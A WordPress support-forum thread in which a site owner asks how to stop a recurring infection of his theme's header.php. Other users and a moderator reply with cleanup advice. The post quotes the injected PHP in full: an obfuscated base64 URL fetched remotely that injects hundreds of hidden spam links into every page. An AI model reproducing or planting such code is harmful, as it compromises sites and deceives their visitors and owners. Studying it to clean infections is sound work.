WordPress.org

1. Ulysses31
   Member
   Posted 2 years ago #

   Has anyone else been hit by this - how to stop the exploit happening again?
   I deleted the code twice now :(

   You can see the nasty stuff in the last lines at the bottom. Inserts about 600 invisible links for Viagra in your html source. XD

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   
   <head profile="http://gmpg.org/xfn/11">
   
           <META name="verify-v1" content="vr+EovmENQbzitArGOodFTd10dFtSJ3h8bCkBPVdTdE=" />
   
   	<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
   
   	<title><?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> &raquo; Blog Archive <?php } ?> <?php wp_title(); ?></title>
   
   	<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats -->
   
   <?php if (eregi("MSIE",getenv("HTTP_USER_AGENT")) ||
          eregi("Internet Explorer",getenv("HTTP_USER_AGENT"))) { ?><link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/>
   <?php } else { ?>
   
   <link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/>
   
   <?php } ?>
   
   	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
   	<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
   	<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
   	<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
   
   	<style type="text/css" media="screen"></style>
   
   	<?php wp_head(); ?>
   </head>
   <body>
   	<div id="topbar">
   	<div class="searchform"><?php include (TEMPLATEPATH . '/searchform.php'); ?></div>
   	<div class="nav"><a href="<?php echo get_settings('home'); ?>">Home</a>&nbsp;&nbsp;|&nbsp;&nbsp;
   <!--
   	<a href="">Link 1</a>&nbsp;&nbsp;|&nbsp;&nbsp;
   	<a href="">Link 2</a>&nbsp;&nbsp;|&nbsp;&nbsp;
   	<a href="">Link 3</a>&nbsp;&nbsp;|&nbsp;&nbsp;
   	<a href="">Link 4</a>&nbsp;&nbsp;|&nbsp;&nbsp;
   	<a href="">Link 5</a>&nbsp;&nbsp;|&nbsp;&nbsp;
   -->
   </div>
   
   	</div>
   	<div id="headerimg"></div>
   
   <div id="page-top"><div id="page-bottom"><div id="page">
   <?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv'; $opt_id='0687d858c81740b39cf1d01bdde2afc7'; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>

2. Edward Caissie
   Member
   Posted 2 years ago #

   Looks suspiciously like a bad theme to me ... which one are you using?

3. adamt07
   Member
   Posted 2 years ago #

   if it's anything similar to a bug that hit mine a couple weeks ago (the gumblar script) you may want to check the images folder for a script labeled image.php and delete it. There's a plugin called "exploit-scanner" that could probably help you alot.

4. whooami
   Member
   Posted 2 years ago #

   ... if it's anything similar to a bug that hit mine a couple weeks ago (the gumblar script)

   gumblar is most definitely not a bug.

5. adamt07
   Member
   Posted 2 years ago #

   I guess malware script would have been more appropriate...

6. techguy
   Member
   Posted 2 years ago #

   Had the same thing happened. Removed the code and it's gone for now. Now to figure out how it happened in the first place. Any suggestions would be appreciated.

7. Samuel B
   moderator
   Posted 2 years ago #

   most of the exploits lately take advantage of weak and easily guessed ftp passwords

   cpanel users are particularly vulnerable with weak passwords because user names carry across all functions
   control panel, ftp, mysql, etc.

   if they keep coming back, they are in more than one script or in the database in which case deleting the code does no good until the db is taken care of

   there are plenty of threads here and on google search that addresses cleaning of hacked wordpress blogs

   also, if you guys are on shared servers, you should report this to your host so they can look into if other users were also hacked

Topic Closed

This topic has been closed to new replies.